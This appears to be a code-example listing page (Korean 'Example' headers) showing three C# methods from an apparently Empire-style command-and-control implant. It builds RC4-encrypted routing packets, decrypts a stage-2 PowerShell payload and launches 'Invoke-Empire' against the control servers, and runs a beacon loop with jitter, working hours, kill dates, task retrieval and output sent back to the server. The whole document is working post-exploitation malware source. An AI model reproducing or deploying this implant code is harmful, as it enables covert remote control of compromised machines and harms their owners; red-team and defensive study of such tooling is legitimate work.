예제 #1
0
        ////////////////////////////////////////////////////////////////////////////////
        //
        ////////////////////////////////////////////////////////////////////////////////
        private byte[] NewRoutingPacket(byte[] encryptedBytes, int meta)
        {
            int encryptedBytesLength = 0;

            if (encryptedBytes != null && encryptedBytes.Length > 0)
            {
                encryptedBytesLength = encryptedBytes.Length;
            }

            byte[] data = Encoding.ASCII.GetBytes(sessionInfo.GetAgentID());
            byte   lang = 0x03;

            data = Misc.combine(data, new byte[4] {
                lang, Convert.ToByte(meta), 0x00, 0x00
            });
            data = Misc.combine(data, BitConverter.GetBytes(encryptedBytesLength));

            byte[] initializationVector = NewInitializationVector(4);
            byte[] rc4Key            = Misc.combine(initializationVector, sessionInfo.GetStagingKeyBytes());
            byte[] routingPacketData = EmpireStager.rc4Encrypt(rc4Key, data);

            routingPacketData = Misc.combine(initializationVector, routingPacketData);
            if (encryptedBytes != null && encryptedBytes.Length > 0)
            {
                routingPacketData = Misc.combine(routingPacketData, encryptedBytes);
            }

            return(routingPacketData);
        }
예제 #2
0
        ////////////////////////////////////////////////////////////////////////////////
        //
        ////////////////////////////////////////////////////////////////////////////////
        private void PowershellEmpire(byte[] stage2Response)
        {
            string empire    = Encoding.ASCII.GetString(aesDecrypt(sessionInfo.GetSessionKey(), stage2Response));
            string execution = "Invoke-Empire";

            execution += " -Servers \"" + sessionInfo.GetControlServers().First() + "\"";
            execution += " -StagingKey \"" + sessionInfo.GetStagingKey() + "\"";
            execution += " -SessionKey \"" + sessionInfo.GetSessionKey() + "\"";
            execution += " -SessionID  \"" + sessionInfo.GetAgentID() + "\"";

#if (PRINT)
            Console.WriteLine(execution);
#endif
            using (Runspace runspace = RunspaceFactory.CreateRunspace())
            {
                runspace.Open();

                using (Pipeline pipeline = runspace.CreatePipeline())
                {
                    pipeline.Commands.AddScript(empire + ";" + execution + ";");
                    pipeline.Invoke();
                }
            }
        }
예제 #3
0
        ////////////////////////////////////////////////////////////////////////////////
        // Main Loop
        ////////////////////////////////////////////////////////////////////////////////
        private void Run()
        {
            ////////////////////////////////////////////////////////////////////////////////
            if (sessionInfo.GetKillDate().CompareTo(DateTime.Now) > 0 || coms.MissedCheckins > sessionInfo.GetDefaultLostLimit())
            {
                jobTracking.CheckAgentJobs(ref packets, ref coms);

                if (packets.Length > 0)
                {
                    coms.SendMessage(packets);
                }

                string message = "";
                if (sessionInfo.GetKillDate().CompareTo(DateTime.Now) > 0)
                {
                    message = "[!] Agent " + sessionInfo.GetAgentID() + " exiting: past killdate";
                }
                else
                {
                    message = "[!] Agent " + sessionInfo.GetAgentID() + " exiting: Lost limit reached";
                }

                ushort result = 0;
                coms.SendMessage(coms.EncodePacket(2, message, result));
                Environment.Exit(1);
            }

            ////////////////////////////////////////////////////////////////////////////////

            if (null != sessionInfo.GetWorkingHoursStart() && null != sessionInfo.GetWorkingHoursEnd())
            {
                DateTime now = DateTime.Now;

                if ((sessionInfo.GetWorkingHoursEnd() - sessionInfo.GetWorkingHoursStart()).Hours < 0)
                {
                    sessionInfo.SetWorkingHoursStart(sessionInfo.GetWorkingHoursStart().AddDays(-1));
                }

                if (now.CompareTo(sessionInfo.GetWorkingHoursStart()) > 0 &&
                    now.CompareTo(sessionInfo.GetWorkingHoursEnd()) < 0)
                {
                    TimeSpan sleep = sessionInfo.GetWorkingHoursStart().Subtract(now);
                    if (sleep.CompareTo(0) < 0)
                    {
                        sleep = (sessionInfo.GetWorkingHoursStart().AddDays(1) - now);
                    }
                    Thread.Sleep((int)sleep.TotalMilliseconds);
                }
            }

            ////////////////////////////////////////////////////////////////////////////////
            if (0 != sessionInfo.GetDefaultDelay())
            {
                int max = (int)((sessionInfo.GetDefaultJitter() + 1) * sessionInfo.GetDefaultDelay());
                if (max > int.MaxValue)
                {
                    max = int.MaxValue - 1;
                }

                int min = (int)((sessionInfo.GetDefaultJitter() - 1) * sessionInfo.GetDefaultDelay());
                if (min < 0)
                {
                    min = 0;
                }

                int sleepTime;
                if (min == max)
                {
                    sleepTime = min;
                }
                else
                {
                    Random random = new Random();
                    sleepTime = random.Next(min, max);
                }

                Thread.Sleep(sleepTime * 1000);
            }

            ////////////////////////////////////////////////////////////////////////////////
            byte[] jobResults = jobTracking.GetAgentJobsOutput(ref coms);
            if (0 < jobResults.Length)
            {
                coms.SendMessage(jobResults);
            }

            ////////////////////////////////////////////////////////////////////////////////
            byte[] taskData = coms.GetTask();
            if (taskData.Length > 0)
            {
                coms.MissedCheckins = 0;
                if (String.Empty != Encoding.UTF8.GetString(taskData))
                {
                    coms.DecodeRoutingPacket(taskData, ref jobTracking);
                }
            }
            GC.Collect();
        }